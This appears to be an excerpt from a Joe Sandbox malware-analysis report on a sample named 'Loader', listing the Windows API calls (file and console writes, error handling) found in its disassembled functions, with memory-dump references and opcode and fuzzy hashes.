                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D7E8856
                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D7E889C
                                                                  • GetLastError.KERNEL32 ref: 6D7E893F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                  • String ID:
                                                                  • API String ID: 2112829910-0
                                                                  • Opcode ID: 35ee73db90e3967cb92e8211cbb7ef2c10116118584cac3b1e5c1c29baaaf1e8
                                                                  • Instruction ID: 748ab479ec5f492ca988b0904437dde1aacbd267914af5939dde495398e1035b
                                                                  • Opcode Fuzzy Hash: 35ee73db90e3967cb92e8211cbb7ef2c10116118584cac3b1e5c1c29baaaf1e8
                                                                  • Instruction Fuzzy Hash: D7D18A75D04258AFCF01CFE8C984AADBBB4FF49364F18452AE925EB341D730A941CB92
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustPointer
                                                                  • String ID:
                                                                  • API String ID: 1740715915-0
                                                                  • Opcode ID: 5fe7cab16bf41ab0fc231d7c49163e318783ea5e9db8de5c78aa0e13674ce9b5
                                                                  • Instruction ID: 1f2d4f1a1cbe507598e65c94200de84843a525f326a84d1524aaeaef8a7c8ce2
                                                                  • Opcode Fuzzy Hash: 5fe7cab16bf41ab0fc231d7c49163e318783ea5e9db8de5c78aa0e13674ce9b5
                                                                  • Instruction Fuzzy Hash: 4651F372A04602AFEB26CF54CA42BBA73B4FF447B5F11452EED1597290E731E880C792
                                                                  APIs
                                                                    • Part of subcall function 6D7E5E98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D7E803F,?,00000000,-00000008), ref: 6D7E5EF9
                                                                  • GetLastError.KERNEL32 ref: 6D7E4B48
                                                                  • __dosmaperr.LIBCMT ref: 6D7E4B4F
                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 6D7E4B89
                                                                  • __dosmaperr.LIBCMT ref: 6D7E4B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1913693674-0
                                                                  • Opcode ID: 5c3c6518a1f4a657b7dcbf0e1b29a0f0a270b1cd36964fcb85fd29bc2fc04f53
                                                                  • Instruction ID: 86ccef04a04f6948614bd554f47cd55666482540cd6a097009325fa2f959fb2e
                                                                  • Opcode Fuzzy Hash: 5c3c6518a1f4a657b7dcbf0e1b29a0f0a270b1cd36964fcb85fd29bc2fc04f53
                                                                  • Instruction Fuzzy Hash: 0C21C57260820AAF9B118F65DA44E2BB7BDFF483FC7018529E919D7250D730ED00A792
                                                                  APIs
                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6D7E9465,00000000,00000001,00000000,?,?,6D7E8993,?,00000000,00000000), ref: 6D7E9CBD
                                                                  • GetLastError.KERNEL32(?,6D7E9465,00000000,00000001,00000000,?,?,6D7E8993,?,00000000,00000000,?,?,?,6D7E8F36,00000000), ref: 6D7E9CC9
                                                                    • Part of subcall function 6D7E9C8F: CloseHandle.KERNEL32(FFFFFFFE,6D7E9CD9,?,6D7E9465,00000000,00000001,00000000,?,?,6D7E8993,?,00000000,00000000,?,?), ref: 6D7E9C9F
                                                                  • ___initconout.LIBCMT ref: 6D7E9CD9
                                                                    • Part of subcall function 6D7E9C51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D7E9C80,6D7E9452,?,?,6D7E8993,?,00000000,00000000,?), ref: 6D7E9C64
                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6D7E9465,00000000,00000001,00000000,?,?,6D7E8993,?,00000000,00000000,?), ref: 6D7E9CEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                  • String ID:
                                                                  • API String ID: 2744216297-0
                                                                  • Opcode ID: 25534981f1d9c4306afd90b15f0d2b59fb12965e58b29a261449d7dd3a753285
                                                                  • Instruction ID: 7ccc92ad96afd488e206feec0cb7117131cb2053e68158b9b95312bf4b604086
                                                                  • Opcode Fuzzy Hash: 25534981f1d9c4306afd90b15f0d2b59fb12965e58b29a261449d7dd3a753285
                                                                  • Instruction Fuzzy Hash: 61F01C37001219BBCF122FA1CD09A9A7FB6FB093B5B454022FA1D85120D772D8A0EBD2
                                                                  APIs
                                                                    • Part of subcall function 6D7E85A1: GetConsoleOutputCP.KERNEL32(5073EDC3,00000000,00000000,?), ref: 6D7E8604
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6D7E6CEB,?), ref: 6D7E8FD9
                                                                  • GetLastError.KERNEL32(?,6D7E6CEB,?,~k~m,00000000,?,00000000,6D7E6B7E,?,00000000,00000000,6D7F2958,0000002C,6D7E6BEF,?), ref: 6D7E8FE3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1298274193.000000006D7B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D7B0000, based on PE: true
                                                                  • Associated: 00000005.00000002.1298252193.000000006D7B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298391654.000000006D7EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298417015.000000006D7F4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1298572293.000000006D848000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6d7b0000_Loader.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                  • String ID: l~m
                                                                  • API String ID: 2915228174-3895294639
                                                                  • Opcode ID: 4c61b42a7fc4fdc6611ec2a4ae907301e781c9636dacb4ac7d7e1de36fd8b6b1
                                                                  • Instruction ID: edfe6b5ccf59b5bf38268c2b8bb32d4cdbc233ee6c7ee34d5fe4ce0024b03946
                                                                  • Opcode Fuzzy Hash: 4c61b42a7fc4fdc6611ec2a4ae907301e781c9636dacb4ac7d7e1de36fd8b6b1
                                                                  • Instruction Fuzzy Hash: 1561B971D1411AAFDF01CFA8CE44AEEBFB9BF49364F44455AE910A7241D331D901CBA2